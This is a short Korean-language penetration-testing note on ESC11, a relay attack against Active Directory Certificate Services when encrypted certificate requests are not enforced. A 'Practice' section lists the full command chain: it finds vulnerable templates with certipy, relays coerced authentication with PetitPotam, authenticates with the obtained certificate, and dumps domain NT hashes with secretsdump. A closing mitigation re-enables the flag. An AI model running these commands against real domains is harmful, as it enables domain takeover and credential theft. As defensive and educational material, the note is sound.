ESC11

AD CS는 기본적으로 ICertPassage 원격 프로토콜은 클라이언트가 CA과 상호 작용하여 CA로부터 인증서를 요청/수신 할 수 있도록 하는 원격 프로시저를엔드포인트로 노출합니다. IF_ENFORCEENCRYPTICERTREQUEST 플래그가 활성화 되면 RPC 인터페이스는 RPC_C_AUTHN_LEVEL_PKT_PRIVACY 인증 레벨의 연결만 허용하며, 이것은 가장 높은 인증 레벨입니다. 이는 모든 종류의 릴레이 공격을 방지하기 위해 각 패킷의 서명과 암호화를 요구합니다.

RPC 등록 인터페이스가 패킷 프라이버시를 요구하지 않으면 ESC11과 같은 Relay 공격에 취약하지만 이 플래그는 기본적으로 활성화 되어있는 상태이기 때문에 기본값은 안전합니다. 하지만 대상 도메인에 Windows Server 2012 미만또는 Windows Server 2008과 같은 이전 버전의 Windows Server가 있거나, Windows XP를 실행하는 클라이언트와 같이 필요한 RPC 인증 수준을 지원할 수 없는 클라이언트를 허용하기 위해서 종종 관리자가 플래그를 변경하는 경우가 있습니다.

IF_ENFORCEENCRYPTICERTREQUEST 플래그가 비활성화 된 상태라면, 암호화 되지 않은 세션 (HTTP를 통한 SMB NTLM 인증 릴레이)을 사용하여 인증서 등록이 가능할 수 있습니다.

Practice

# 취약한 CA 템플릿 검색
certipy-ad find -u <USER> -p <PASS> -dc-ip <dc-ip> -vulnerable -stdout -enabled

# 대상의 강제 인증 수신 대기
certipy-ad relay -target <rpc://ADCS> -ca <CA> -template DomainController

# 강제 인증
python3 PettiPotam.py -u <USER> -p <PASS> -d <Domain> <dc-ip> <dc-ip>

# 강제 인증을 통해 얻은 pfx 파일 덤핑
certipy-ad auth -pfx <PFX File>

# Domain NT Hash 덤핑
KRB5CCNAME=<Domain.ccache> /usr/share/doc/python3-impacket/examples/secretsdump.py -k -no-pass <Domain FQDN>

대응 방안

# CA 플래그 활성화
certutil -setreg CA\InterfaceFlags +IF_ENFORCEENCRYPTICERTREQUEST

# 재실행
net stop certsvc & net start certsvc

References